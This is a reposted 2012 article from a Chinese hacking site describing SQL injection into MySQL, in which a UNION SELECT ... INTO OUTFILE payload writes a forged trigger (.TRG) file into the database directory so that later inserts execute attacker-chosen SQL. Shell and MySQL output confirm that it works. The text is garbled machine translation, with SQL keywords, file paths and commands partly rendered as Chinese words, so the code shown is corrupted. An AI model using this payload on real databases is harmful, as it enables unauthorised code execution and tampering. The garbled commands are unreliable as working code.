安全黑客
当前位置:安全黑客文章资讯安全技术脚本攻防
日期:2012-07-04 10:01:00  来源:本站整理

MySQL数据库堆积查询与SQL注入详解[脚本攻防]

赞助商链接



  本文“MySQL数据库堆积查询与SQL注入详解[脚本攻防]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

安全黑客基地网络汇集整理称:当时一向没有去测试,本日测试了一下,记录一下

递减aa.article;
+ ----------- + -------------- + ------ + ----- + --------- + ---------------- +
|场|范例| NULL |重点|默许|额外|
+ -------- --- + -------------- + ------ + ----- + --------- + -------- -------- +
| articleid | INT(11)|号|优先级| NULL | AUTO_INCREMENT |
|标题| VARCHAR(100)|号| | | |
内容|文字|否| |空| |
+ ----------- + -------------- + ------ + ----- + --------- + ---------------- +
3行集(0.01秒)
 
履行语句:
SELECT *从文章articleid = 3和1 = 2 UNION SELECT NULL,NULL,'范例=触发器“成OUTFILE
'的/ var / lib中/ MySQL的/ AA / article.TRG“线端”\ ntriggers = \'的CREATE DEFINER的'根'@'本地主机'用户插入的每一行后触发ATK \ \ nbegin \ \ n挑选1111到OUTFILE
 
挑选*从文章里articleid = 3和1 = 2 UNION SELECT NULL,NULL,'型=触发INTO OUTFILE
    - >'/ VAR / LIB / MYSQL / AA / article.TRG“线端”\ ntriggers = \'创作DEFINER的'根'@'本地主机'用户插入的每一行后触发ATK \ \ nbegin \ \ n选取1111 INTO OUTFILE
(0.04秒)肯定,1行受影响的
 
本地文件:
根@的Ubuntu :/ VAR / LIB / MYSQL / AA#猫article.TRG
\ n \ N型触发器
触发器='成立DEFINER的'根'@'本地主机'触发攻击后,用户每一行的插入\ nbegin \ n选取1111 INTO OUTFILE
 
LS / tmp / aa.txt文件中
LS:无法拜候的/ tmp / aa.txt文件:没有那个文件或目录
 
回到mysql的外壳下履行:
 
MySQL的>插入到文章(articleid,标题,内容)值(20,2,3);
1行受影响(0.00秒)查询肯定,
 
再看看文件:
根@ Ubuntu的:/ VAR / LIB / MYSQL / AA上#ls / tmp / aa.txt文件中
的/ tmp / aa.txt文件
的根的Ubuntu :/ VAR / lib目录/ MYSQL / AA#猫


  以上是“MySQL数据库堆积查询与SQL注入详解[脚本攻防]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
  • Windows 搭配 IIS7 PHP MySQL 环境
  • 某电器网站客服中央mysql字符型盲注及修复
  • mysql Out of memory (Needed 16777224 bytes)的错误办理
  • mysql提醒[Warning] Invalid (old?) table or database name问题的办理办法
  • mysql启用skip-name-resolve情势时呈现Warning的处理办法
  • mysql启用skip-name-resolve情势时呈现Warning的处理办法
  • MySQL Order By语法介绍
  • <b>MySQL ORDER BY 的实现解析</b>
  • mysql数据库插入速度和读取速度的调整记录
  • MySQL Order By索引优化办法
  • MySQL Order By用法分享
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .